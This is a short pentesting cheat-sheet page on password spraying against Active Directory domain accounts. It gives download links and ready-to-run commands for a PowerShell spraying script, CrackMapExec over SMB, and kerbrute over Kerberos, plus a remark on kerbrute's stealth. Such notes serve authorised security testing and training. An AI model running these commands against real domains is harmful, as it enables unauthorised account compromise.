search

Password Spraying

circle-info

This requires to have a cleartext password or list of passwords and access to a domain joined machine.

Try a specific password or password list on all domain users.

hashtag
Password Spraying via PS Script

Download at https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1arrow-up-right

.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

(-Admin to also try on adminstrator users, -File to use wordlist).

hashtag
Password Spraying via SMB

This relies on trying to authenticate via SMB

Download here => https://github.com/byt3bl33d3r/CrackMapExecarrow-up-right

crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

We can put the IP of any domain joined machine

hashtag
Password Spraying via TGT

This relies on trying to authenticate via Kerberos (aka getting a TGT)

Download here => https://github.com/ropnop/kerbrutearrow-up-right

.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

It's good for stealth, only it only uses two UDP frames to determine whether the password is valid, as it sends only an AS-REQ and examines the response. If the credentials are valide we receive a TGT

We can also use kinit to send a single set of creds and get a TGT back

PreviousAbuse Net-NTLMv2 Protocol (Crack or Relay)NextAS-REP Roasting

Last updated